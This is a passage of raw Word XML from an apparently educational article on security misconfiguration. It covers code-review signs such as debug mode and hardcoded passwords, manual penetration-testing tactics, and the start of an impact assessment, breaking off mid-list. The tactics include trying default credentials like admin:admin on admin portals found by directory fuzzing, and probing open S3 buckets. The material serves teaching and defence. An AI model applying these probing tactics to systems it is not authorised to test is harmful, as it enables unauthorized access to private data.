          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>customErrors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode="Off"/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>&lt;compilation debug="true"/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>web.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> files, which forces the app to spit out detailed stack traces to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37757D74" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Python (Django/Flask):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Searching for </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DEBUG = True</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a production environment configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AA6DB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hardcoded Defaults and Static Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBFDF9E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Reviewing database configuration modules or connection strings for static strings like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>password: "admin"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>password: "root"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or API keys left unparameterized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F2BC37" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>XML Parser Configurations (CWE-611 / XXE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B61B9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for instantiated XML parsers (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DocumentBuilderFactory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java) where external entity resolution features are not explicitly disabled ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>setFeature("http://xml.org/sax/features/externalgeneral-entities", false)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If missing, it indicates a vulnerable default XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E50C495" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. Penetration Testing (Behavioral &amp; Manual Verification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9261D1"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lastRenderedPageBreak/>
        <w:t>Penetration testers look to actively bypass or abuse the system's operational baseline using manual manipulation tactics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BF7906" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Information Gathering via Forced Information Leaks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192BCCF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Presenting unexpected request methods (e.g., sending a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>TRACK</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> request instead of a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), manipulating parameter types (sending </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>id[]=1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> array parameters into an expected integer field), or dropping trailing slashes to trigger server routing loops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2562450A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Payload/Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forcing a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>500 Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to read the server headers and error body for technology banners (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Server: Apache/2.4.41 (Ubuntu)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FF6394" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Credential Stuffing &amp; Default Path Hunting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C0186" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Punting lists of known vendor default credentials against administrative portals found via directory brute-forcing (fuzzing paths with tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F36CF1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Payload/Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attempting variations of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>tomcat:tomcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on exposed management screens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA70561" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloud Storage and Resource Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B866469" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inspecting the client-side JavaScript or network logs of a web app to identify backend storage URLs (like AWS S3 buckets or Azure Blob containers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6C186" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Payload/Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modifying the URL directly in a browser or CLI tool to access the root directory (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>https://[bucket-name].s3.amazonaws.com/</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) to check if an XML file listing all private user uploads is returned due to open read permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB000F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Impact Assessment (Damages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143DF2C7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Technical Impact: System &amp; Data Damages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27978008"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 xml:space="preserve">The technical blast radius of a Security Misconfiguration is unpredictable because it depends entirely on </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was misconfigured. It frequently acts as a gateway vulnerability, allowing attackers to chain minor configuration flaws into full system compromises:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A176E2C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Unauthorized Privilege Escalation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Leaving default administrative accounts active or misconfiguring role-based access controls (RBAC) allows an unauthenticated attacker to instantly gain the highest level of privileges (e.g., global admin or root access) without cracking a single password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEA81D2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
